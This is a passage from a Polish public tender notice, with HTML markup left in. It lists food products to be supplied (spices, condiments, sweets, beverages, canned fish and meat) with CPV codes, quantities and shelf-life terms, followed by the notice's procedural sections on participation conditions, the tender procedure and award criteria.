spożycia min. 3 miesiące od daty dostawy. W ilości 30 kg.	48. CPV 03222315-4 Żurawina. Owoce suszone, zdrowe, całe, nieuszkodzone, bez zapachów obcych. Opakowanie jedn. do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 30 kg.	49. CPV 03222115-2 Rodzynki - zdrowe, całe, nieuszkodzone suszone owoce winogron. Opakowanie jedn. do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 20	kg.	50. CPV 15332240-8 Galaretka owocowa. Galaretka o smaku owocowym (np. truskawkowym, wiśniowym, agrestowym itp.). Opakowanie torebka o wadze 50g -90g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 10 kg.	51. CPV 15800000-6 Żelatyna spożywcza wieprzowa. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 14 kg.	52. CPV 15800000-6 Kwasek cytrynowy spożywczy. Kryształy sypkie, bez zlepów i grudek, obcego zapachu. Opakowanie jedn. do 0,5 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy.	W ilości 10 kg. 53. CPV 15332400-8 Ananas w syropie – skład: krążki ananasa, woda, cukier. Opakowanie jedn: puszka o wadze do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy.	W ilości 50 kg. 54. CPV 15332400-8 Brzoskwinie w syropie – skład: połówki brzoskwiń, woda, cukier. Opakowanie jedn: puszkao wadze do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 50 kg. 55. CPV 15870000-7 Liść laurowy, Liść laurowy suszony. Opakowanie jedn. waga do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 16 kg.	56. CPV 15870000-7 Ziele angielskie - przyprawa ziołowa. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 30 kg.	57. CPV 15870000-7 Papryka mielona. Barwa czerwona mielona. Smak ostry lub łagodny-słodki. Opakowanie jedn. do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 20	kg.	58. CPV 15870000-7 Papryka wędzona. Papryka czerwona mielona wędzona słodka. Opakowanie jedn. do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 20	kg. 59. CPV 15871100-5 Ocet spirytusowy 10% Opakowanie jedn. butelka 0,5 l- 1 l . Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 200 litr.	60. CPV 15871110-8 Ocet jabłkowy. Produkt z przetworzonych jabłek, o barwie żółto-brązowej, lekko mętny. Opakowanie jednostkowe do 1 l. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 100 litr.61. CPV 15871210-9 Sos sojowy. Produkt wytworzony z soi, pszenicy, wody i soli. Opakowanie jedn. do 1 l. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 60 litr.	62. CPV 15872400-5 Sól jodowana spożywcza. Opakowanie jednostkowe 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 400 kg.	63. CPV 15872400-5 Sól ziołowa. Mieszanka soli jodowanej i przypraw (np. bazylia, cząber, oregano, gorczyca, pieprz czarny, lubczyk, pietruszka, czosnek, tymianek, rozmaryn, koperek). Opakowanie jedn. do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 40 kg. 64. CPV 15872100-2 Pieprz czarny mielony Zmielone suszone owoce czarnego pieprzu. Opakowania jedn. do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 40	kg.	65. CPV 15872100-2 Pieprz kolorowy ziarnisty. Mieszanka pieprzy czarnego, białego, różowego i zielonego. Opakowania jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 20	kg.66. CPV 15872100-2 Pieprz ziołowy Przyprawa o charakterystycznym ziołowym smaku. Opakowania jednostkowe do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 40 kg. 67. CPV 15872100-2 Pieprz cytrynowy. Mieszanka ziół i przypraw. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 10 kg. 68. CPV 03221120-3 Czosnek granulowany. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 30 kg.	69. CPV15331110-1 Cebula prażona. Chrupiąca smażona cebulka, kolor złoty. Opakowanie jednostkowe do 1kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 30	kg. 70. CPV 15872300-4 Tymianek Wysuszone ziele tymianku o silnym aromatycznym zapachu i gorzkawym smaku. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 16	kg.71. CPV 15872300-4 Zioła prowansalskie Mieszanka ziół rozmarynu, tymianku, bazylii, estragonu, cząbru. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 20	kg.72. CPV 15870000-7 Majeranek Przyprawa ziołowa. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 16 kg.73. CPV 15872300-4 Bazylia. Suszone liście bazylii. Opakowanie jednostkowe torebka papierowa do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 16 kg.	74. CPV 15872300-4 Estragon. Estragon suszony. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 16 kg. 75. CPV 15872300-4 Lubczyk. Suszone liście lubczyku. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 16 kg.	76. CPV 15872300-4 Rozmaryn. Rozmaryn cięty suszony. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 16 kg.	77. CPV 15872500-6 Imbir mielony. Imbir suszony mielony. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 10 kg. 78. CPV 15872300-4 Cząber. Suszone liście cząbru ogrodowego. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 10 kg.	79. CPV 15872300-4 Oregano. Suszone liście oregano. Opakowanie jedn. do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 16 kg.	80. CPV 15870000-7 Curry. Kompozycja ziół, przypraw i suszonych warzyw o charakterystycznym, pikantnym aromacie i smaku. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 16 kg.	81. CPV 15870000-7 Kurkuma. Kurkuma suszona. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 16 kg. 82. CPV 15872300-4 Kminek mielony. Zmielone nasiona kminku. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 30 kg.	83. CPV 15872300-4 Gorczyca ziarna. Nasiona gorczycy. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 10 kg. 84. CPV 15872000-1 Gałka muszkatołowa mielona. Opakowanie jednostkowe do 1 kg. Termin przydatności do spożycia min. 6 miesięcy od daty dostawy. W ilości 10 kg. 85. CPV 15871270-7 Przyprawa do ryb. Opakowanie jednostkowe waga do 1kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 10 kg. 86. CPV 15871270-7 Przyprawa w proszku do potraw. Przyprawa warzywna do zup, potraw mięsnych i ryb. Opakowanie jedn. do 1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 30 kg. 87. CPV 15891500-5 Przyprawa do zup w płynie. Opakowanie jednostkowe butelka szklana 0,25 kg -1 kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 400 kg. 88. CPV 15871230-5 Ketchup. Keczup jednorazowy w saszetkach o wadze 10g-15g. w opakowaniu zbiorczym do 5 kg. Ketchup o smaku łagodnym lub pikantnym, zawartość pomidorów nie mniej niż 140g na 100g produktu. Możliwość zakupu w opakowaniu jednostkowym o wadze 0,4-1kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy.	W ilości 500 kg.89. CPV 15871250-1 Musztarda. Musztarda jednorazowa w saszetkach o wadze 10g-15g. W opakowaniu zbiorczym do 5 kg. Możliwość zakupu w opakowaniu jednostkowym o wadze 0,4-1kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy.	W ilości 600 kg.	90. CPV 15871273-8 Majonez. Składniki podstawowe: olej roślinny, żółtko jaja nie mniej niż 6,0%. Opakowanie jednostkowe słoik waga 0,4 kg-1kg. Termin przydatności do spożycia min 3 miesiące od daty dostawy. W ilości 400 kg.91. CPV 15842220-0 Wafelek w czekoladzie. Wafelek w czekoladzie waga 40g.-50g. Wafel z kremem (np. kakaowym, orzechowym, waniliowym lub innym), polany czekoladą mleczną. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 8000 szt.	92. CPV 15842220-0 Baton czekoladowy. Czekolada mleczna min. 30 % i dodatki (np. karmel, orzeszki, rodzynki, wiórka kokosowe, ciastka itp.). Opakowanie 40g-60g. Termin przydatności do spożycia min 3 miesiące od daty dostawy. W ilości 8000 szt.	93. CPV 15842300-5. Ciastka. Ciastka na wagę w opakowaniach kartonowych o wadze do 3 kg. Różne rodzaje, formy i dodatki, przekładane nadzieniem lub dekorowane na wierzchu. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 600 kg.	94. CPV 15842000-2 Cukierki czekoladowe. Cukierki oblane czekoladą mleczną z różnym nadzieniem (np. owocowym, karmelowym, orzechowym, kokosowym itp.). Opakowania do 3kg. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 300 kg.	95. CPV 15612500-6 Paluszki. Paluszki cienkie z dodatkiem soli, sezamu lub maku. Opakowania do 400g. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 400 kg. 96. CPV 15981000-8 Naturalna woda mineralna niegazowana / gazowana 0,5 litra. Naturalna woda mineralna nasycona lub nienasycona dwutlenkiem węgla. Opakowanie jednostkowe: butelki z tworzywa sztucznego typu 0,50 litra. Termin przydatności do spożycia min 3 miesiące od daty dostawy. W ilości 3000 litr.	97. CPV 15981000-8 Naturalna woda mineralna niegazowana/gazowana 1,50 litra. Naturalna woda mineralna nasycona lub nienasycona dwutlenkiem węgla. Opakowanie jednostkowe: butelki z tworzywa sztucznego 1,50 litra. Termin przydatności do spożycia min 3 miesiące od daty dostawy. W ilości 2000 litr.	98. CPV 15981000-8 Woda źródlana niegazowana 5 litrów. Woda źródlana niegazowana w butelkach z tworzywa sztucznego o poj. 5 l. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 8000 litr. 99. CPV 15982100-6 Sok owocowy 200 ml. Sok owocowy (np. pomarańczowy, jabłkowy, z czarnej porzeczki) produkowany z soku owoców lub zagęszczonego soku owocowego zawierający naturalne składniki smakowo-aromatyczne, niegazowany. Kartonik 0,20 litra z przyklejoną słomką. Termin przydatności do spożycia min 3 miesiące od daty dostawy.	W ilości 1000 litr.	100. CPV 15982000-5 Napoje owocowe. Napój owocowy(np. jabłkowy, pomarańczowy, grejpfrutowy, z czarnej porzeczki), produkowany z soku owoców lub zagęszczonego soku owocowego zawierający naturalne składniki smakowo-aromatyczne, niegazowany. Konsystencja płynna, zawartość ekstraktu nie mniej niż 10%. Opakowanie jednostkowe do 2 litrów. Termin przydatności do spożycia min 3 miesiące od daty dostawy. W ilości 1000 litr. 101. CPV 15411100-3 Frytura. Olej palmowy rafinowany 100% przeznaczony do smażenia w wysokiej temperaturze. Opakowania do 25 l. W ilości 500 litr.	102. CPV 15243000-3 Makrela w oleju. Ryba makrela nie mniej niż 50%, Masa netto 150g-400g. Termin przydatności do spożycia nie krótszy niż 3 miesiące od daty dostawy. W ilości 200	kg. 103. CPV 15240000-2 Makrela w sosie pomidorowym. Ryba makrela nie mniej niż 50%. Masa netto 150g-400g. Termin przydatności do spożycia nie krótszy niż 3 miesiące od daty dostawy. W ilości 200 kg.	104. CPV 15240000-2 Paprykarz rybny. Konserwa rybna: mięso ryb minimum 30%. Opakowanie jednostkowe: puszka o wadze od 130 g do 350 g. Termin przydatności do spożycia nie krótszy niż 3 miesiące od daty dostawy.W ilości 500 kg.	105. CPV 15131000-5 Konserwa mięsna drobiowa. Opakowanie jedn. 100g -150g. Konserwa mięsna drobiowaw foremce aluminiowej, sterylizowana. Mięso drobiowe minimum 50%. Termin przydatności do spożycia min. 3 miesiące od daty dostawy. W ilości 500 kg.	106. CPV 15131000-5 Pasztet drobiowy. Opakowanie jedn. 110g- 160g. Pasztet z drobiu w foremce aluminiowej. Termin przydatności do spożycia min. 3 miesiące od daty od daty dostawy. W ilości 500	kg. 107. CPV 15230000-9 Śledzie solone matias, Filety całe bez obcych zanieczyszczeń, produkt o wysokich walorach smakowych, soczysty, o delikatnej teksturze i łagodnym smaku, barwa tkanki mięsnej jasna, biała do lekko kremowej; cechy dyskwalifikujące: filety rozpadające się, filety o luźnej konsystencji, przebarwienia świadczące o nieświeżości filetów. Opakowanie: wiaderko plastikowe o wadze od 2 kg do 4 kg .Termin przydatności do spożycia nie krótszy niż 30 dni od daty dostawy. W ilości 600 kg.	</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">15800000-6</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>15610000-7</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-09-30</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykonawca, zgodnie z art. 24 ust. 11 ustawy Pzp w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp przekaże zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt. 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena oferty brutto</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin płatności</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, 